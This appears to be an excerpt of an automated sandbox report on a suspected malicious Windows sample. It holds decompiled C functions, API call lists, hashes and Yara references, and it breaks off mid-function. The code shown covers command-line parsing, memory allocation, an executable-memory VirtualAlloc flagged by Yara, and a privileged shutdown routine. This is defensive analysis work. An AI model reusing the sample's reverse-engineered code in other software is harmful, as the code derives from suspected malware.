Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
Instruction ID: c9fc7c92a7cec4c9f4a35bfa16e57d250416f75581f2c593a26caa7fdf97897f
Opcode Fuzzy Hash: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
Instruction Fuzzy Hash: 49F0B4B07042086BE750FB758E02FBA32A8DB44304F4100BFBA86F61D1DD789D648658

Uniqueness

Uniqueness Score: -1.00%

Function 00404B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x408d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x408d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x408d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d6c)) = 0;
				return 0;
			}

0x00404b66
0x00404b74
0x00404b98
0x00404ba0
0x00000000
0x00404bac
0x00404ba4
0x00000000
0x00404ba4
0x00404b78
0x00404b7e
0x00404b84
0x00404b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00404FA1,00000000), ref: 00404B98

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
Instruction ID: b92c02e1d42775b4d64c1b480fc1218859da62ddf6c23338d971301b0ff3d73c
Opcode Fuzzy Hash: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
Instruction Fuzzy Hash: F4F0FE71500B089EC7618E398E00653BBE4AED53603100A3F95EEF21D0EB34A871DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004066AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x004066b1
0x004066ba
0x004066c7
0x004066bc
0x004066be
0x004066be

APIs

GetFileAttributesA.KERNELBASE(?,00404777,?,00404E38,?), ref: 004066B1

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
Instruction ID: b0bf721a4a9401975da429cbe36b66188ee692fd53fb4aa260148cb1fc4dfac4
Opcode Fuzzy Hash: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
Instruction Fuzzy Hash: D0B0927662254442AA200A316C2995A2845A6C123A7E52BA1F033E02E0CA3EC8A6D008

Uniqueness

Uniqueness Score: -1.00%

Function 067B0485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 067B04D6

Memory Dump Source

Source File: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67b0000_d3HccaLUT7.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: edebcd11b08b85f73c5dd3a0847b19f7ec6a62587adcfbc2b27879f2bf795403
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 41113C79A00208EFDB41DF98C985E99BBF5AF08350F058094FA489B361D371EA90DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00404caa
0x00404cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
Instruction ID: 9573c9426388a2d7b89283d718c50bbdfd09632f04378d08ec902689231ba7f3
Opcode Fuzzy Hash: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
Instruction Fuzzy Hash: 83B0123204430CB7CF001FC2EC09F853F1DE7C4761F140010FA0C450508A729420869B

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00404cc8
0x00404ccf

APIs

GlobalFree.KERNEL32 ref: 00404CC8

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
Instruction ID: 12c573750d921541fd6cb29f5945249fc66636a9552ad745523379c0a512c5ca
Opcode Fuzzy Hash: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
Instruction Fuzzy Hash: 52B0123100020CB7CF001F42ED088453F1DD6C02607000020F90C410218B339821858A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00405C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x408004; // 0x7980a54a
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00406CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00406E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x408004; // 0x7980a54a
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0040597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E004044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x409124 = E00406285();
									_t75 = 0;
								}
								return E00406CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E004044B9(0, 0x521, 0x401140, 0, 0x40, 0);
												_t85 =  *0x408588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0040667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0040667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00405C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00401680(0x408c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0040667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0040667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x408a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00405C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x408b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x408a3a;
																}
																E00401680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0040658A(_t218, 0x104, 0x401140);
																if(E004031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x408a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x408a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x408a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x408a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x408a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x409a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x409a2c =  *0x409a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x408d48 =  *0x408d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x409a2c =  *0x409a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x409a2c =  *0x409a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x408d48 =  *0x408d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x409a2c =  *0x409a2c | 0x00000004;
																										L70:
																										 *0x408a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x409a2c = 3;
																	 *0x408a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x408a2c != 0 &&  *0x408b3e == 0) {
						if(GetModuleFileNameA( *0x409a3c, 0x408b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E004066C8(0x408b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00405c9e
0x00405ca9
0x00405cb0
0x00405cb3
0x00405cb6
0x00405cb7
0x00405cb8
0x00405cbd
0x00406204
0x00405ccb
0x00000000
0x00405ccb
0x00405cd3
0x00405cd7
0x00405cf4
0x00000000
0x00405cf4
0x00405cf8
0x00405d00
0x00000000
0x00405d06
0x00405d06
0x00405d0e
0x00405d10
0x00405d12
0x00405d14
0x00405d15
0x00405d17
0x00405d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d19
0x00405d19
0x00405d1d
0x00000000
0x00405d3f
0x00405d3f
0x00405d4b
0x00405d4b
0x00405d4f
0x00405d8d
0x00000000
0x00405d93
0x00405d93
0x00405d9a
0x00405d9d
0x00405d9e
0x00000000
0x00405d9e
0x00405d51
0x00405d5b
0x00405d72
0x004060fb
0x004060fb
0x00406207
0x0040620a
0x0040620b
0x0040620e
0x00406217
0x00405d78
0x00405d78
0x00405d80
0x00405d83
0x00405d84
0x00000000
0x00405d84
0x00405d5d
0x00405d5f
0x00405d62
0x00405d68
0x00405d64
0x00405d64
0x00405d64
0x00000000
0x00405d62
0x00405d5b
0x00405d4f
0x00405d1d
0x00000000
0x00405d9f
0x00405d9f
0x00405da5
0x00405dab
0x00405dba
0x00406218
0x0040621d
0x00406220
0x00406221
0x00406229
0x00406230
0x00406247
0x0040626a
0x00406272
0x00406249
0x00406255
0x0040625f
0x00406264
0x00406264
0x00406284
0x00405dc0
0x00405dc0
0x00405dca
0x00405e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dcc
0x00405dce
0x00405e24
0x00405e24
0x00405e2c
0x00405e47
0x00405e4a
0x004061d2
0x004061e2
0x004061e7
0x004061ee
0x004061f1
0x004061f1
0x004061f8
0x004061f8
0x00405e50
0x00405e53
0x00406109
0x0040611f
0x00000000
0x00406125
0x00406137
0x0040613a
0x0040613c
0x0040613e
0x0040613e
0x00406141
0x00406141
0x00406143
0x00406144
0x0040614a
0x00000000
0x00406150
0x00406152
0x0040615c
0x00406170
0x00406172
0x0040617c
0x00406190
0x00406190
0x00406196
0x004061a5
0x00000000
0x004061ab
0x004061b9
0x004061c6
0x004061c6
0x0040617e
0x00406180
0x0040618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040618a
0x0040615e
0x00406160
0x0040616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040616a
0x0040615c
0x0040614a
0x0040610b
0x0040610e
0x0040610e
0x00000000
0x00405e59
0x00405e59
0x00405e5c
0x0040604f
0x00406056
0x00000000
0x0040605c
0x0040606e
0x00406071
0x00406073
0x00406075
0x00406075
0x00406078
0x00406078
0x0040607a
0x0040607b
0x00406081
0x00000000
0x00406087
0x00406087
0x0040608d
0x0040609c
0x00000000
0x004060a2
0x004060aa
0x004060b2
0x004060b7
0x004060bd
0x004060bf
0x004060bf
0x004060d6
0x004060e0
0x004060e7
0x004060f5
0x00000000
0x00000000
0x00000000
0x00000000
0x004060f5
0x0040609c
0x00406081
0x00405e62
0x00405e62
0x00405e65
0x00405fd3
0x00405fe9
0x00000000
0x00405fef
0x00405fef
0x00405ff7
0x00405ffd
0x00406003
0x00406006
0x00406011
0x00406014
0x0040603d
0x00406016
0x00406018
0x00406019
0x0040601b
0x00406033
0x0040601d
0x00406020
0x00406029
0x00406022
0x00406022
0x00406022
0x00406020
0x0040601b
0x00406042
0x00406044
0x00406046
0x0040604a
0x00405ff7
0x00405fd5
0x00405fd8
0x00405fd8
0x00000000
0x00405e6b
0x00405e6b
0x00405e6e
0x00405f8b
0x00405f99
0x00000000
0x00405f9f
0x00405fa7
0x00405faf
0x00000000
0x00405fb1
0x00405fb3
0x00000000
0x00405fb5
0x00405fb7
0x00000000
0x00405fb9
0x00000000
0x00405fb9
0x00405fb7
0x00405fb3
0x00405faf
0x00405f8d
0x00405f8d
0x00405f8d
0x00405f8f
0x00405fc1
0x00405fc1
0x00405fc1
0x00000000
0x00405e74
0x00405e74
0x00405e77
0x00405ea0
0x00405ebd
0x00405f79
0x00000000
0x00405f7f
0x00405ec3
0x00405ec3
0x00405ecc
0x00405ed4
0x00405ed6
0x00405edc
0x00405edf
0x00405eea
0x00405eed
0x00405f3f
0x00405f40
0x00000000
0x00405eef
0x00405eef
0x00405ef2
0x00405f34
0x00405ef4
0x00405ef4
0x00405ef7
0x00405f2b
0x00000000
0x00405ef9
0x00405ef9
0x00405efc
0x00405f22
0x00000000
0x00405efe
0x00405eff
0x00405f02
0x00405f16
0x00405f04
0x00405f07
0x00405f0d
0x00405f46
0x00405f46
0x00405f09
0x00405f09
0x00405f09
0x00405f07
0x00405f02
0x00405efc
0x00405ef7
0x00405ef2
0x00405f4c
0x00405f4e
0x00405f50
0x00405f54
0x00405ed4
0x00405ea2
0x00405ea4
0x00405eaf
0x00405eaf
0x00000000
0x00405e79
0x00405e7d
0x00000000
0x00405e83
0x00405e83
0x00405e83
0x00405e85
0x00405e85
0x00405e8e
0x00000000
0x00405e94
0x00000000
0x00405e94
0x00405e8e
0x00405e7d
0x00405e77
0x00405e6e
0x00405e65
0x00405e5c
0x00000000
0x00000000
0x00000000
0x00405dd0
0x00405dd0
0x00405dd0
0x00000000
0x00405dd0
0x00405dce
0x00405dca
0x00405dba
0x00000000
0x00405d00
0x00405dd9
0x00405e04
0x004061fe
0x00405e0a
0x00405e0c
0x00405e17
0x00405e17
0x00405e04
0x00406200
0x00406200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00405CEE
GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DFC
CharUpperA.USER32(?), ref: 00405E3E
CharUpperA.USER32(-00000052), ref: 00405EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F6F
CharUpperA.USER32(?), ref: 00405FA7
CharUpperA.USER32(-0000004E), ref: 00406008
CharUpperA.USER32(?), ref: 004060AA
CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061F1
ExitProcess.KERNEL32 ref: 004061F8

Strings

", xrefs: 0040612D
:, xrefs: 00406118
RegServer, xrefs: 00405F66
", xrefs: 00405D78

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
Instruction ID: 3f853014ee877d2515ec6058bf9da6422bf58f592a71eae056d1935db408f189
Opcode Fuzzy Hash: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
Instruction Fuzzy Hash: B0D11771A04A455AEB358B388D487BB3B61EB16304F1440BBD8CAF62D1D67C8E82CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x409a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x408004; // 0x7980a54a
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E004044B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00406CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E004044B9(0, 0x522, 0x401140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00401EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00401f90
0x00401f90
0x00401f93
0x00401f98
0x00401fa4
0x00401fa7
0x00401fc5
0x00401fcd
0x00401fdb
0x00401ee5
0x00401eea
0x00401ef1
0x00401ef4
0x00401f0c
0x00401f2e
0x00401f3a
0x00401f46
0x00401f4d
0x00401f58
0x00401f60
0x00401f61
0x00401f62
0x00401f75
0x00401f80
0x00401f77
0x00401f77
0x00000000
0x00401f77
0x00401f64
0x00401f64
0x00000000
0x00401f64
0x00401f0e
0x00401f0e
0x00401f13
0x00401f13
0x00401f14
0x00401f14
0x00401f16
0x00401f17
0x00401f1a
0x00401f1f
0x00401f1f
0x00401f86
0x00401f8f
0x00401fcf
0x00401fd3
0x00000000
0x00401fd3
0x00401fa9
0x00401fb4
0x00401fbb
0x00401fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00401fc3
0x00401f9a
0x00401f9a
0x00401fa2
0x00401fd9
0x00401fda
0x00000000
0x00000000
0x00000000
0x00401fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00401EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00401F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00401FD3

Strings

SeShutdownPrivilege, xrefs: 00401F28

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
Instruction ID: 05ee149af66cfd38363aee8e227656f8d8a40696282e74b864cdd5f9a16ea6ab
Opcode Fuzzy Hash: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
Instruction Fuzzy Hash: 972176B1A402066ADB205BA19D4AF7F76B8EBC5714F10003AFB06F61E1D77D8811966E

Uniqueness

Uniqueness Score: -1.00%

Function 004017EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E004017EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
